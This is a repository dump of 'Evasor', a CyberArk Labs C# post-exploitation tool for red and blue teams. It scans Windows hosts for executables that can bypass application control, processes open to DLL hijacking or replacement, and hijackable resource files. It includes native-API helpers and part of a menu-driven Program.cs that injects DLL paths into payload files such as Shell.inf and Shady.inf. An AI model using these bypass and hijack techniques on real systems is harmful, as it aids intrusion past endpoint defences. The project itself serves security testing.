├── .codeclimate.yml ├── .vs └── Evasor │ └── v15 │ ├── .suo │ └── Server │ └── sqlite3 │ ├── db.lock │ ├── storage.ide │ ├── storage.ide-shm │ └── storage.ide-wal ├── CHANGELOG.md ├── CONTRIBUTING.md ├── Evasor.sln ├── Evasor ├── Evasor.csproj ├── FileUtil.cs ├── Module.cs ├── Native.cs ├── Program.cs ├── Properties │ └── AssemblyInfo.cs ├── Refrence_DLLs_to_be_added to the project │ ├── Microsoft.Office.Interop.Word.dll │ ├── Newtonsoft.Json.dll │ ├── Newtonsoft.Json.xml │ ├── System.Data.SQLite.dll │ ├── System.Data.SQLite.xml │ └── System.Management.Automation.dll ├── Report.cs ├── ScreenCapture.cs ├── bin │ └── Debug │ │ ├── DLLs │ │ ├── Shady.inf │ │ ├── Shell.cs │ │ ├── Shell.csproj │ │ ├── Shell.fsscript │ │ ├── Shell.hta │ │ ├── Shell.inf │ │ ├── Shell.rsp │ │ ├── Shell.sct │ │ ├── Shell.txt │ │ └── Shell.vbs │ │ ├── Evasor.exe.config │ │ ├── Evasor.pdb │ │ ├── REPORT │ │ └── Evasor-Report.docx │ │ └── TEMP │ │ ├── Evasor-0-Report.docx │ │ ├── Evasor-1-Report.docx │ │ ├── Evasor-2-Report.docx │ │ ├── Evasor-3-Report.docx │ │ ├── Evasor-4-Report.docx │ │ └── ~$nd0rArk-3-Report.docx └── obj │ └── Debug │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── Evasor.csproj.CopyComplete │ ├── Evasor.csproj.CoreCompileInputs.cache │ ├── Evasor.csproj.FileListAbsolute.txt │ ├── Evasor.csprojAssemblyReference.cache │ ├── Evasor.exe.config │ ├── Evasor.pdb │ ├── TemporaryGeneratedFile_036C0B5B-1481-4323-8D20-8F5ADCB23D92.cs │ ├── TemporaryGeneratedFile_5937a670-0e60-4077-877b-f7221da3dda1.cs │ └── TemporaryGeneratedFile_E7A71F73-0F8D-4B9B-B56E-8E70B10BC5D3.cs ├── Evasor_WCpOGoPmka.png ├── LICENSE ├── README.md └── devenv_vTcX5EfWI2.png /.codeclimate.yml: -------------------------------------------------------------------------------- 1 | # This is our default .CodeClimate.yml, broken out by language. Uncomment the 2 | # sections at the bottom that apply to your project. ACTION comments indicate 3 | # places where config might need to be tweaked. 
4 | 5 | version: "2" 6 | 7 | plugins: 8 | 9 | # --------------- 10 | # Cross-language plugins. Should always be on. 11 | 12 | duplication: # Looks for similar and identical code blocks 13 | enabled: true 14 | config: 15 | languages: 16 | go: 17 | java: 18 | javascript: 19 | php: 20 | python: 21 | python_version: 3 # ACTION Comment this out if using Python 2 22 | ruby: 23 | swift: 24 | typescript: 25 | 26 | fixme: # Flags any FIXME, TODO, BUG, XXX, HACK comments so they can be fixed 27 | enabled: true 28 | config: 29 | strings: 30 | - FIXME 31 | - TODO 32 | - HACK 33 | - XXX 34 | - BUG 35 | 36 | # --------------- 37 | # Commonly-used languages - run time is minimal and all of these will work 38 | # whether files of that language are found or not. In general, leave uncommented 39 | 40 | # Markdown 41 | markdownlint: 42 | enabled: true 43 | 44 | # Go 45 | gofmt: 46 | enabled: true 47 | golint: 48 | enabled: true 49 | govet: 50 | enabled: true 51 | 52 | # Ruby 53 | flog: 54 | enabled: true 55 | reek: 56 | enabled: true 57 | rubocop: 58 | enabled: true 59 | channel: rubocop-0-79 # As of March 10, 2020, rubocop 0.80.1 is the latest 60 | # However, it does not work with CodeClimate - throws 61 | # an Invalid JSON error. 62 | # ACTION uncomment bundler-audit below if using Gemfile/Gemfile.lock 63 | # ACTION uncomment brakeman below if using Rails 64 | 65 | # Shell scripts 66 | shellcheck: 67 | enabled: true 68 | 69 | # --------------- 70 | # Other languages - will work with or without language files present. Again, 71 | # runtime is minimal, so OK to leave uncommented. 
72 | 73 | # CoffeeScript 74 | coffeelint: 75 | enabled: true 76 | 77 | # CSS 78 | csslint: 79 | enabled: true 80 | 81 | # Groovy 82 | codenarc: 83 | enabled: true 84 | 85 | # Java 86 | pmd: 87 | enabled: true 88 | sonar-java: 89 | enabled: true 90 | config: 91 | sonar.java.source: "7" # ACTION set this to the major version of Java used 92 | # ACTION uncomment checkstyle below if Java code exists in repo 93 | 94 | # Node.js 95 | nodesecurity: 96 | enabled: true 97 | # ACTION uncomment eslint below if JavaScript already exists and .eslintrc 98 | # file exists in repo 99 | 100 | # PHP 101 | phan: 102 | enabled: true 103 | config: 104 | file_extensions: "php" 105 | phpcodesniffer: 106 | enabled: true 107 | config: 108 | file_extensions: "php,inc,lib" 109 | # Using Wordpress standards as our one PHP repo is a Wordpress theme 110 | standards: "PSR1,PSR2,WordPress,WordPress-Core,WordPress-Extra" 111 | phpmd: 112 | enabled: true 113 | config: 114 | file_extensions: "php,inc,lib" 115 | rulesets: "cleancode,codesize,controversial,naming,unusedcode" 116 | sonar-php: 117 | enabled: true 118 | 119 | # Python 120 | bandit: 121 | enabled: true 122 | pep8: 123 | enabled: true 124 | radon: 125 | enabled: true 126 | # config: 127 | # python_version: 2 # ACTION Uncomment these 2 lines if using Python 2 128 | sonar-python: 129 | enabled: true 130 | 131 | # --------------- 132 | # Configuration Required Language specific - these will error and abort the 133 | # codeclimate run if they are turned on and certain files or configuration are 134 | # missing. 
Should be commented out unless the project already includes the 135 | # necessary files that the linter looks at 136 | 137 | # Ruby - requires presence of Gemfile and Gemfile.lock 138 | # bundler-audit: 139 | # enabled: true 140 | 141 | # Rails - requires detecting a Rails application 142 | # brakeman: 143 | # enabled: true 144 | 145 | # Chef - requires detecting a cookbook 146 | # foodcritic: 147 | # enabled: true 148 | 149 | # Java - might require Java code? Errored when run without 150 | # checkstyle: 151 | # enabled: true 152 | 153 | # JavaScript - requires an eslintrc to be created and added to project 154 | # eslint: 155 | # enabled: true 156 | # channel: "eslint-6" 157 | 158 | # --------------- 159 | # List any files/folders to exclude from checking. Wildcards accepted. Leave 160 | # commented if no files to exclude as an empty array will error 161 | exclude_patterns: 162 | - ".gitignore" 163 | -------------------------------------------------------------------------------- /.vs/Evasor/v15/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/.vs/Evasor/v15/.suo -------------------------------------------------------------------------------- /.vs/Evasor/v15/Server/sqlite3/db.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/.vs/Evasor/v15/Server/sqlite3/db.lock -------------------------------------------------------------------------------- /.vs/Evasor/v15/Server/sqlite3/storage.ide: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/.vs/Evasor/v15/Server/sqlite3/storage.ide -------------------------------------------------------------------------------- 
/.vs/Evasor/v15/Server/sqlite3/storage.ide-shm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/.vs/Evasor/v15/Server/sqlite3/storage.ide-shm -------------------------------------------------------------------------------- /.vs/Evasor/v15/Server/sqlite3/storage.ide-wal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/.vs/Evasor/v15/Server/sqlite3/storage.ide-wal -------------------------------------------------------------------------------- /CHANGELOG.md: -------------------------------------------------------------------------------- 1 | # Changelog 2 | All notable changes to this project will be documented in this file. 3 | 4 | The format is based on [Keep a Changelog](http://keepachangelog.com/en/1.0.0/) 5 | and this project adheres to [Semantic Versioning](http://semver.org/spec/v2.0.0.html). 6 | 7 | ## [Unreleased] 8 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Contributing 2 | 3 | We are accepting contributions. 4 | 5 | For general contribution and community guidelines, please see the [community repo](https://github.com/cyberark/community). 6 | 7 | ## Table of Contents 8 | 9 | - [Development](#development) 10 | - [Testing](#testing) 11 | - [Releases](#releases) 12 | - [Contributing](#contributing-workflow) 13 | 14 | ## Development 15 | 16 | We recommend using Visual Studio 2017 for development. 17 | 18 | ## Testing 19 | 20 | We currently don't have tests; once they are ready, this section will be updated. 21 | 22 | ## Releases 23 | 24 | Releases will be built and checked by the owner of the repository. 25 | 26 | ## Contributing workflow 27 | 28 | 1. 
[Fork the project](https://help.github.com/en/github/getting-started-with-github/fork-a-repo) 29 | 2. [Clone your fork](https://help.github.com/en/github/creating-cloning-and-archiving-repositories/cloning-a-repository) 30 | 3. Make local changes to your fork by editing files 31 | 3. [Commit your changes](https://help.github.com/en/github/managing-files-in-a-repository/adding-a-file-to-a-repository-using-the-command-line) 32 | 4. [Push your local changes to the remote server](https://help.github.com/en/github/using-git/pushing-commits-to-a-remote-repository) 33 | 5. [Create new Pull Request](https://help.github.com/en/github/collaborating-with-issues-and-pull-requests/creating-a-pull-request-from-a-fork) 34 | 35 | From here your pull request will be reviewed and once you've responded to all 36 | feedback it will be merged into the project. Congratulations, you're a contributor! 37 | -------------------------------------------------------------------------------- /Evasor.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.705 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Evasor", "Evasor\Evasor.csproj", "{1C8849EF-AD09-4727-BF81-1F777BD1AEF8}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {1C8849EF-AD09-4727-BF81-1F777BD1AEF8}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {1C8849EF-AD09-4727-BF81-1F777BD1AEF8}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {1C8849EF-AD09-4727-BF81-1F777BD1AEF8}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {1C8849EF-AD09-4727-BF81-1F777BD1AEF8}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | 
GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {B0A7CAC5-C319-4873-AB0C-67D7669758E8} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Evasor/Evasor.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {1C8849EF-AD09-4727-BF81-1F777BD1AEF8} 8 | Exe 9 | Evasor 10 | Evasor 11 | v4.6.1 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | 37 | False 38 | True 39 | Refrence_DLLs_to_be_added to the project\Microsoft.Office.Interop.Word.dll 40 | 41 | 42 | False 43 | Refrence_DLLs_to_be_added to the project\Newtonsoft.Json.dll 44 | 45 | 46 | 47 | 48 | Refrence_DLLs_to_be_added to the project\System.Data.SQLite.dll 49 | 50 | 51 | 52 | 53 | False 54 | Refrence_DLLs_to_be_added to the project\System.Management.Automation.dll 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | -------------------------------------------------------------------------------- /Evasor/FileUtil.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Runtime.InteropServices; 7 | using System.Diagnostics; 8 | using System; 9 | using System.Collections.Generic; 10 | 11 | namespace Evasor 12 | { 13 | static public class FileUtil 14 | { 15 | [StructLayout(LayoutKind.Sequential)] 16 | struct RM_UNIQUE_PROCESS 17 | { 18 | public int dwProcessId; 19 | public System.Runtime.InteropServices.ComTypes.FILETIME 
ProcessStartTime; 20 | } 21 | 22 | const int RmRebootReasonNone = 0; 23 | const int CCH_RM_MAX_APP_NAME = 255; 24 | const int CCH_RM_MAX_SVC_NAME = 63; 25 | 26 | enum RM_APP_TYPE 27 | { 28 | RmUnknownApp = 0, 29 | RmMainWindow = 1, 30 | RmOtherWindow = 2, 31 | RmService = 3, 32 | RmExplorer = 4, 33 | RmConsole = 5, 34 | RmCritical = 1000 35 | } 36 | 37 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 38 | struct RM_PROCESS_INFO 39 | { 40 | public RM_UNIQUE_PROCESS Process; 41 | 42 | [MarshalAs(UnmanagedType.ByValTStr, SizeConst = CCH_RM_MAX_APP_NAME + 1)] 43 | public string strAppName; 44 | 45 | [MarshalAs(UnmanagedType.ByValTStr, SizeConst = CCH_RM_MAX_SVC_NAME + 1)] 46 | public string strServiceShortName; 47 | 48 | public RM_APP_TYPE ApplicationType; 49 | public uint AppStatus; 50 | public uint TSSessionId; 51 | [MarshalAs(UnmanagedType.Bool)] 52 | public bool bRestartable; 53 | } 54 | 55 | [DllImport("rstrtmgr.dll", CharSet = CharSet.Unicode)] 56 | static extern int RmRegisterResources(uint pSessionHandle, 57 | UInt32 nFiles, 58 | string[] rgsFilenames, 59 | UInt32 nApplications, 60 | [In] RM_UNIQUE_PROCESS[] rgApplications, 61 | UInt32 nServices, 62 | string[] rgsServiceNames); 63 | 64 | [DllImport("rstrtmgr.dll", CharSet = CharSet.Auto)] 65 | static extern int RmStartSession(out uint pSessionHandle, int dwSessionFlags, string strSessionKey); 66 | 67 | [DllImport("rstrtmgr.dll")] 68 | static extern int RmEndSession(uint pSessionHandle); 69 | 70 | [DllImport("rstrtmgr.dll")] 71 | static extern int RmGetList(uint dwSessionHandle, 72 | out uint pnProcInfoNeeded, 73 | ref uint pnProcInfo, 74 | [In, Out] RM_PROCESS_INFO[] rgAffectedApps, 75 | ref uint lpdwRebootReasons); 76 | 77 | static public List WhoIsLocking(string path) 78 | { 79 | uint handle; 80 | string key = Guid.NewGuid().ToString(); 81 | List processes = new List(); 82 | 83 | int res = RmStartSession(out handle, 0, key); 84 | if (res != 0) throw new Exception("Could not begin restart 
session. Unable to determine file locker."); 85 | 86 | try 87 | { 88 | const int ERROR_MORE_DATA = 234; 89 | uint pnProcInfoNeeded = 0, 90 | pnProcInfo = 0, 91 | lpdwRebootReasons = RmRebootReasonNone; 92 | 93 | string[] resources = new string[] { path }; // Just checking on one resource. 94 | 95 | res = RmRegisterResources(handle, (uint)resources.Length, resources, 0, null, 0, null); 96 | 97 | if (res != 0) throw new Exception("Could not register resource."); 98 | 99 | //Note: there's a race condition here -- the first call to RmGetList() returns 100 | // the total number of process. However, when we call RmGetList() again to get 101 | // the actual processes this number may have increased. 102 | res = RmGetList(handle, out pnProcInfoNeeded, ref pnProcInfo, null, ref lpdwRebootReasons); 103 | 104 | if (res == ERROR_MORE_DATA) 105 | { 106 | // Create an array to store the process results 107 | RM_PROCESS_INFO[] processInfo = new RM_PROCESS_INFO[pnProcInfoNeeded]; 108 | pnProcInfo = pnProcInfoNeeded; 109 | 110 | // Get the list 111 | res = RmGetList(handle, out pnProcInfoNeeded, ref pnProcInfo, processInfo, ref lpdwRebootReasons); 112 | if (res == 0) 113 | { 114 | processes = new List((int)pnProcInfo); 115 | 116 | // Enumerate all of the results and add them to the 117 | // list to be returned 118 | for (int i = 0; i < pnProcInfo; i++) 119 | { 120 | try 121 | { 122 | processes.Add(Process.GetProcessById(processInfo[i].Process.dwProcessId)); 123 | } 124 | // catch the error -- in case the process is no longer running 125 | catch (ArgumentException) { } 126 | } 127 | } 128 | else throw new Exception("Could not list processes locking resource."); 129 | } 130 | else if (res != 0) throw new Exception("Could not list processes locking resource. 
Failed to get size of result."); 131 | } 132 | finally 133 | { 134 | RmEndSession(handle); 135 | } 136 | 137 | return processes; 138 | } 139 | } 140 | } 141 | -------------------------------------------------------------------------------- /Evasor/Module.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.IO; 4 | using System.Linq; 5 | using System.Text; 6 | using System.Threading.Tasks; 7 | 8 | namespace Evasor 9 | { 10 | public class Module 11 | { 12 | public Module(string moduleName, IntPtr baseAddress, uint size) 13 | { 14 | this.ModuleName = moduleName; 15 | this.BaseAddress = baseAddress; 16 | this.Size = size; 17 | } 18 | 19 | public string ModuleName { get; set; } 20 | public IntPtr BaseAddress { get; set; } 21 | public uint Size { get; set; } 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /Evasor/Native.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.IO; 4 | using System.Linq; 5 | using System.Runtime.InteropServices; 6 | using System.Text; 7 | using System.Threading.Tasks; 8 | 9 | namespace Evasor 10 | { 11 | public class Native 12 | { 13 | [StructLayout(LayoutKind.Sequential)] 14 | public struct ModuleInformation 15 | { 16 | public IntPtr lpBaseOfDll; 17 | public uint SizeOfImage; 18 | public IntPtr EntryPoint; 19 | } 20 | 21 | internal enum ModuleFilter 22 | { 23 | ListModulesDefault = 0x0, 24 | ListModules32Bit = 0x01, 25 | ListModules64Bit = 0x02, 26 | ListModulesAll = 0x03, 27 | } 28 | 29 | [DllImport("psapi.dll")] 30 | public static extern bool EnumProcessModulesEx(IntPtr hProcess, [MarshalAs(UnmanagedType.LPArray, ArraySubType = UnmanagedType.U4)] [In][Out] IntPtr[] lphModule, int cb, [MarshalAs(UnmanagedType.U4)] out int lpcbNeeded, uint dwFilterFlag); 31 | 32 | 
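[DllImport("psapi.dll")]
        public static extern uint GetModuleFileNameEx(IntPtr hProcess, IntPtr hModule, [Out] StringBuilder lpBaseName, [In] [MarshalAs(UnmanagedType.U4)] uint nSize);

        [DllImport("psapi.dll", SetLastError = true)]
        public static extern bool GetModuleInformation(IntPtr hProcess, IntPtr hModule, out ModuleInformation lpmodinfo, uint cb);

        /// <summary>
        /// Enumerates the modules loaded in <paramref name="process"/> via psapi and returns one
        /// <see cref="Module"/> (file name, base address, image size) per module handle obtained.
        /// </summary>
        /// <param name="process">Process whose modules are read. Its <c>Handle</c> is used directly,
        /// so the property must be obtainable (it throws when the process has exited or the handle
        /// cannot be opened with the required access).</param>
        /// <returns>The collected modules; an empty list when the size query fails.</returns>
        public List<Module> CollectModules(System.Diagnostics.Process process)
        {
            List<Module> collectedModules = new List<Module>();

            IntPtr[] modulePointers = new IntPtr[0];
            int bytesNeeded = 0;

            // First call with an empty buffer only asks how many bytes the handle array needs.
            if (!Native.EnumProcessModulesEx(process.Handle, modulePointers, 0, out bytesNeeded, (uint)Native.ModuleFilter.ListModulesAll))
            {
                return collectedModules;
            }

            int totalNumberofModules = bytesNeeded / IntPtr.Size;
            modulePointers = new IntPtr[totalNumberofModules];

            // Second call fills the array. The module list can change between the two calls, so only
            // the entries the second call actually wrote are trusted: bytesNeeded may come back smaller
            // than the buffer, and entries past it would be zero handles.
            if (Native.EnumProcessModulesEx(process.Handle, modulePointers, bytesNeeded, out bytesNeeded, (uint)Native.ModuleFilter.ListModulesAll))
            {
                int returnedModules = Math.Min(totalNumberofModules, bytesNeeded / IntPtr.Size);
                // cb for GetModuleInformation is the size of the MODULEINFO struct itself, not of the
                // handle array that was previously passed here.
                uint moduleInfoSize = (uint)Marshal.SizeOf(typeof(Native.ModuleInformation));

                for (int index = 0; index < returnedModules; index++)
                {
                    StringBuilder moduleFilePath = new StringBuilder(1024);
                    // Return value (characters copied, 0 on failure) is not checked: on failure the
                    // builder stays empty and the module is recorded with an empty name.
                    Native.GetModuleFileNameEx(process.Handle, modulePointers[index], moduleFilePath, (uint)(moduleFilePath.Capacity));

                    string moduleName = Path.GetFileName(moduleFilePath.ToString());
                    Native.ModuleInformation moduleInformation = new Native.ModuleInformation();
                    Native.GetModuleInformation(process.Handle, modulePointers[index], out moduleInformation, moduleInfoSize);

                    // Convert to the normalized Module type used by the rest of the tool.
                    collectedModules.Add(new Module(moduleName, moduleInformation.lpBaseOfDll, moduleInformation.SizeOfImage));
                }
            }

            return collectedModules;
        }
    }
}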
-------------------------------------------------------------------------------- /Evasor/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Diagnostics; 4 | using System.IO; 5 | using System.Linq; 6 | using System.Security.AccessControl; 7 | using System.Text; 8 | using System.Threading.Tasks; 9 | using System.Management; 10 | using System.Management.Automation; 11 | using System.Management.Automation.Host; 12 | using System.Runtime.InteropServices; 13 | using System.Dynamic; 14 | using System.Text.RegularExpressions; 15 | using System.Reflection; 16 | using System.Drawing.Imaging; 17 | using System.Threading; 18 | 19 | namespace Evasor 20 | { 21 | class Program 22 | { 23 | static string PATH_OF_Evasor = Path.GetDirectoryName(Path.GetFullPath(Process.GetCurrentProcess().ProcessName + ".exe")); 24 | static List list_of_potential_executables_that_can_bypass_appControl; 25 | static List list_of_available_executables_to_bypass_appControl; 26 | static List list_of_injectable_process; 27 | static List List_Of_Hijckable_dlls; 28 | static List List_Of_Replaceble_dlls; 29 | static List List_Of_hijackble_resources; 30 | static System.Collections.Specialized.StringCollection log = new System.Collections.Specialized.StringCollection(); 31 | static string file_To_Execute = string.Empty; 32 | static string choice = string.Empty; 33 | static string dll = string.Empty; 34 | static string[] sub_Paths; 35 | static List proof_Of_Concepts = new List(); 36 | static List proof_Of_Concepts_Pictures = new List(); 37 | static List file_ends_and_starts = new List(); 38 | static List file_extentions = new List(); 39 | static void Main(string[] args) 40 | { 41 | initialze_And_Set_files_content_to_original(); 42 | list_of_potential_executables_that_can_bypass_appControl = new List(); 43 | list_of_available_executables_to_bypass_appControl = new List(); 44 | 45 | while (true) 46 | 
{ 47 | try 48 | { 49 | print_logo(); 50 | choice = Console.ReadLine(); 51 | switch (choice) 52 | { 53 | case "0": 54 | Help(); 55 | break; 56 | case "1": 57 | console_AppControl_Bypass_prints(); 58 | break; 59 | case "2": 60 | console_DLL_Hijack_Bypass_prints(); 61 | break; 62 | case "3": 63 | console_Resources_Hijack_Bypass_prints(); 64 | break; 65 | case "4": 66 | console_save_report_prints(); 67 | break; 68 | default: 69 | Console.ForegroundColor = ConsoleColor.Red; 70 | Console.WriteLine("No such option... press (0,1,2,3,4) only"); 71 | Console.ForegroundColor = ConsoleColor.Gray; 72 | break; 73 | } 74 | } 75 | catch (Exception ex) 76 | { } 77 | } 78 | } 79 | 80 | private static void print_logo() 81 | { 82 | Console.ForegroundColor = ConsoleColor.White; 83 | Console.WriteLine(); 84 | Console.WriteLine(" //////////((((((/ "); 85 | Console.WriteLine(" .///////(///((((((((((((. "); 86 | Console.WriteLine(" //////////( ((((((((((( "); 87 | Console.WriteLine(" ////////(/( /(/ ((((((((((* "); 88 | Console.WriteLine(" ///////(//( ((((((( ((((((((((( "); 89 | Console.WriteLine(" //////////(* ((((((((( *((((((((((( "); 90 | Console.WriteLine(" /////////((((((((((((((( *(((((((((((( "); 91 | Console.WriteLine(" ////(///(( (((((((((* "); 92 | Console.WriteLine(" //(///((( ((((((((((((((((( ((((((((( "); 93 | Console.WriteLine(" ////((((( ((((((((((((((((( ((((((((( "); 94 | Console.WriteLine(" //((((((( ((((((( ((((((( ((((((((( "); 95 | Console.WriteLine(" ((((((((( ((((((( ((((((( ((((((((( "); 96 | Console.WriteLine(" ,(((((((( (((((( (((((( (((((((( "); 97 | Console.WriteLine(" (((((((( (((((((/ /((((((( (((((((( "); 98 | Console.WriteLine(" ((((((( ((((((((((((((((( ((((((( "); 99 | Console.WriteLine(" (((((( (((((( "); 100 | Console.WriteLine(" .(((((( (((((( "); 101 | Console.WriteLine(" ,(((((((((((((((((((((((((((, "); 102 | Console.WriteLine(" ((((((((((((((((((((((( "); 103 | Console.WriteLine(" .((((((((((((((( "); 104 | Console.WriteLine(); 105 | 
Console.WriteLine(" Developed by Arik Kublanov. "); 106 | Console.ForegroundColor = ConsoleColor.Yellow; 107 | Console.WriteLine(" Version 1.0.0 "); 108 | Console.ForegroundColor = ConsoleColor.White; 109 | Console.WriteLine(" This tool called Evasor which developed in CyberArk Labs. "); 110 | Console.WriteLine(" It's free to be use and change by the cyber security Community. "); 111 | Console.WriteLine(" automates scans/implement different techniques to bypass Windows APP CONTROL."); 112 | Console.Write(" This tool suits both "); 113 | Console.ForegroundColor = ConsoleColor.Red; 114 | Console.Write("red "); 115 | Console.ForegroundColor = ConsoleColor.White; 116 | Console.Write("and "); 117 | Console.ForegroundColor = ConsoleColor.Blue; 118 | Console.Write("blue "); 119 | Console.ForegroundColor = ConsoleColor.White; 120 | Console.WriteLine("teams in post-exploitation phase."); 121 | Console.WriteLine("__________________________________________________________________________________________"); 122 | Console.BackgroundColor = ConsoleColor.Blue; 123 | Console.ForegroundColor = ConsoleColor.White; 124 | Console.WriteLine("|Evasor Menu: |"); 125 | Console.WriteLine("|_________________________________________________________________________________________|"); 126 | Console.BackgroundColor = ConsoleColor.Black; 127 | Console.WriteLine("|0.Help. |"); 128 | Console.WriteLine("|1.Scan For Executibles That Can Bypass Windows APP CONTROL. |"); 129 | Console.WriteLine("|2.Scan for Process vulnerable to DLL hijack, DLL replacement. |"); 130 | Console.WriteLine("|3.Scan for resource hijacking files such as: |"); 131 | Console.WriteLine("| xml,config,json,bat,cmd,ps1,vbs,ini,js,exe,dll,mui,msi,yaml, |"); 132 | Console.WriteLine("| lib,inf,reg,log,htm,hta,sys,rsp |"); 133 | Console.WriteLine("|4.Create Report. 
|"); 134 | Console.WriteLine("|_________________________________________________________________________________________|"); 135 | } 136 | 137 | private static void initialze_And_Set_files_content_to_original() 138 | { 139 | try 140 | { 141 | file_extentions.Add("exe"); 142 | file_extentions.Add("dll"); 143 | file_extentions.Add("ps1"); 144 | file_extentions.Add("bat"); 145 | file_extentions.Add("conf"); 146 | file_extentions.Add("xml"); 147 | file_extentions.Add("vbs"); 148 | file_extentions.Add("cmd"); 149 | file_extentions.Add("ini"); 150 | file_extentions.Add("js"); 151 | file_extentions.Add("json"); 152 | file_extentions.Add("msi"); 153 | file_extentions.Add("yaml"); 154 | file_extentions.Add("lib"); 155 | file_extentions.Add("inf"); 156 | file_extentions.Add("reg"); 157 | file_extentions.Add("log"); 158 | file_extentions.Add("htm"); 159 | file_extentions.Add("hta"); 160 | file_extentions.Add("reg"); 161 | file_extentions.Add("sys"); 162 | file_extentions.Add("cs"); 163 | file_extentions.Add("fsscript"); 164 | file_extentions.Add("rsp"); 165 | file_extentions.Add("sct"); 166 | file_extentions.Add("This program cannot be run in DOS mode"); 167 | 168 | foreach (string file in file_extentions) 169 | { 170 | file_ends_and_starts.Add("." + file + ""); 171 | //here you can add more endings such as <,',>,},],",, 172 | //like -> file_ends_and_starts.Add("." 
+ file + "<"); 173 | } 174 | 175 | file_To_Execute = @"\DLLs\Shell.inf"; 176 | dll = @"\DLLs\cmd.dll"; 177 | set_File_content_to_original(file_To_Execute, dll); 178 | 179 | file_To_Execute = @"\DLLs\Shell.vbs"; 180 | dll = @"\DLLs\minimalist.xml"; 181 | set_File_content_to_original(file_To_Execute, dll); 182 | 183 | file_To_Execute = @"\DLLs\Shell.fsscript"; 184 | dll = @"\DLLs\cmd.dll"; 185 | set_File_content_to_original(file_To_Execute, dll); 186 | 187 | file_To_Execute = @"\DLLs\Shady.inf"; 188 | dll = @"\DLLs\minimalist.sct"; 189 | set_File_content_to_original(file_To_Execute, dll); 190 | 191 | file_To_Execute = @"\DLLs\Shell.rsp"; 192 | dll = @"\DLLs\cmd.dll"; 193 | set_File_content_to_original(file_To_Execute, dll); 194 | } 195 | catch(Exception ex) 196 | { } 197 | } 198 | 199 | private static void console_save_report_prints() 200 | { 201 | try 202 | { 203 | string[] filePaths = Directory.GetFiles(PATH_OF_Evasor + @"\TEMP\"); 204 | string[] documentsToMerge = filePaths; 205 | string outputFileName = (PATH_OF_Evasor + @"\REPORT\" + Process.GetCurrentProcess().ProcessName + "-Report.docx"); 206 | Report.Merge(documentsToMerge, outputFileName, true); 207 | Console.WriteLine(Process.GetCurrentProcess().ProcessName + "-Report.docx created!!!"); 208 | Console.ReadLine(); 209 | } 210 | catch (Exception ex) 211 | { } 212 | } 213 | 214 | private static void set_File_content_to_original(string i_fileToExecute, string i_dll) 215 | { 216 | string text = File.ReadAllText(PATH_OF_Evasor + i_fileToExecute); 217 | text = text.Replace(PATH_OF_Evasor + i_dll, "xxxxxxxxxxxxxxxx"); 218 | File.WriteAllText(PATH_OF_Evasor + i_fileToExecute, text); 219 | } 220 | 221 | private static void set_File_content_before_original(string i_fileToExecute, string i_dll) 222 | { 223 | string text = File.ReadAllText(PATH_OF_Evasor + i_fileToExecute); 224 | text = text.Replace("xxxxxxxxxxxxxxxx", PATH_OF_Evasor + i_dll); 225 | File.WriteAllText(PATH_OF_Evasor + i_fileToExecute, text); 226 | } 227 
